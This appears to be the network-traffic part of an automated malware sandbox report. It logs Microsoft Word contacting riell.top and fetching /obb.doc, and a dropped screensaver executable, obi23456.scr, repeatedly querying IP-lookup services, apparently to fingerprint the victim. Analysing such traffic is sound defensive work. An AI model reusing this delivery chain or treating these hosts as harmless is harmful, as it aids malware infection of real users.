                    Jul 4, 2024 21:38:46.731561899 CEST8.8.8.8192.168.2.220x6bd4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:47.455936909 CEST8.8.8.8192.168.2.220x2c90No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:47.455936909 CEST8.8.8.8192.168.2.220x2c90No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.111586094 CEST8.8.8.8192.168.2.220x2067No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.121042013 CEST8.8.8.8192.168.2.220x57fdNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.877582073 CEST8.8.8.8192.168.2.220x1ed6No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:48.877582073 CEST8.8.8.8192.168.2.220x1ed6No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.599879026 CEST8.8.8.8192.168.2.220x194No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:49.610836983 CEST8.8.8.8192.168.2.220x2284No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:50.797138929 CEST8.8.8.8192.168.2.220x3e63No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:50.797138929 CEST8.8.8.8192.168.2.220x3e63No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.446749926 CEST8.8.8.8192.168.2.220x70acNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:51.455014944 CEST8.8.8.8192.168.2.220xf6b4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:52.056853056 CEST8.8.8.8192.168.2.220xb809No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                    Jul 4, 2024 21:38:52.056853056 CEST8.8.8.8192.168.2.220xb809No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • riell.top
                    • reallyfreegeoip.org
                    • checkip.dyndns.org

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249169193.122.130.0803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:39.152656078 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 4, 2024 21:38:39.672600985 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:39 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: e75afa6fdf63efcc5113f1621775ce98
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:39.885687113 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:39 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: e75afa6fdf63efcc5113f1621775ce98
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:39.941478968 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 4, 2024 21:38:40.196769953 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:40 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 1d6d26e18452270876bcfdcfd3263acd
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:40.409729958 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:40 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 1d6d26e18452270876bcfdcfd3263acd
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:41.286626101 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 4, 2024 21:38:41.390372992 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:41 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a1d0dbffc6ecb4c9df3e3bb69910a407
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:41.605813026 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:41 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a1d0dbffc6ecb4c9df3e3bb69910a407
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249174193.122.6.168803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:42.496218920 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 4, 2024 21:38:43.147842884 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:43 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a70f07d9078d2de796b50f1c9751ed66
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:43.406956911 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:43 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: a70f07d9078d2de796b50f1c9751ed66
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.2249176158.101.44.242803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:44.099689960 CEST127OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Jul 4, 2024 21:38:45.822069883 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:45 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 9785adb446f1c994a92744b2c62b2507
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.2249178158.101.44.242803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:46.737095118 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 4, 2024 21:38:47.441788912 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:47 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 59e9ed8452789cc7214688dc0dae296c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:47.633728027 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:47 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 59e9ed8452789cc7214688dc0dae296c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.2249180132.226.247.73803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:48.126636982 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 4, 2024 21:38:48.818133116 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:48 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: 1cacd2a29fa3ad99e09f14b39623e453
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.2249182132.226.8.169803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:49.619333982 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 4, 2024 21:38:50.781601906 CEST272INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:50 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                    Jul 4, 2024 21:38:50.989830017 CEST272INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:50 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.2249184158.101.44.242803532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    Jul 4, 2024 21:38:51.460690022 CEST151OUTGET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                    Jul 4, 2024 21:38:52.037347078 CEST320INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:51 GMT
                    Content-Type: text/html
                    Content-Length: 103
                    Connection: keep-alive
                    Cache-Control: no-cache
                    Pragma: no-cache
                    X-Request-ID: d3be32935c43034090b0636fe211f65c
                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249161188.114.97.34432544C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:25 UTC131OUTOPTIONS / HTTP/1.1
                    User-Agent: Microsoft Office Protocol Discovery
                    Host: riell.top
                    Content-Length: 0
                    Connection: Keep-Alive
                    2024-07-04 19:38:25 UTC707INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:25 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNpHeuWQvthm8fvWttwj%2FPnwWJ6zY91D59BHt%2FPZABMa%2Fm%2BTqVJ9wZsNhdX0FwDA2fMblEMsIOhRyL8g1SOzR8E%2BRL9Ix3F01%2FVg1xJHfJl5IVNWwbh4wtyi3jo%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e19354be4b4368-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:25 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.2249162188.114.97.34432544C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:26 UTC117OUTHEAD /obb.doc HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Microsoft Office Existence Discovery
                    Host: riell.top
                    2024-07-04 19:38:27 UTC833INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:27 GMT
                    Content-Type: application/msword
                    Content-Length: 549151
                    Connection: close
                    Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
                    ETag: "6685f5f6-8611f"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    CF-Cache-Status: HIT
                    Age: 63610
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n7FsV75SObfyJ3Cn%2FvWluBfQn4cYxIzEmCL5JYojJaY4m7tBwUhMsbZiqVWpfac%2FQWHWtQges2b%2FjDIuXv5X7sxWPRvJgJApABWTuMKHVzjbouA25%2Bd%2BOaaBjjc%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e1935ee9ed1760-EWR
                    alt-svc: h3=":443"; ma=86400


                    Session IDSource IPSource PortDestination IPDestination Port
                    2192.168.2.2249163188.114.96.3443
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:30 UTC126OUTOPTIONS / HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                    translate: f
                    Host: riell.top
                    2024-07-04 19:38:31 UTC699INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:31 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Allow: POST,OPTIONS,HEAD,GET,TRACE
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cE4k2RKQqKLj6L8a6v2CrT4SUEVbaOZG0ESG9fRSbMgUYFan8JYaJICaXUrQ1Nq5HaWOKCdjTAAcjXDo5mOVoWgRgb%2BHegsrkI%2Bb51aPQTCMXVUhNuA0BZ80zN4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                    X-Content-Type-Options: nosniff
                    Server: cloudflare
                    CF-RAY: 89e19377b8d94374-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:31 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination Port
                    3192.168.2.2249164188.114.96.3443
                    TimestampBytes transferredDirectionData
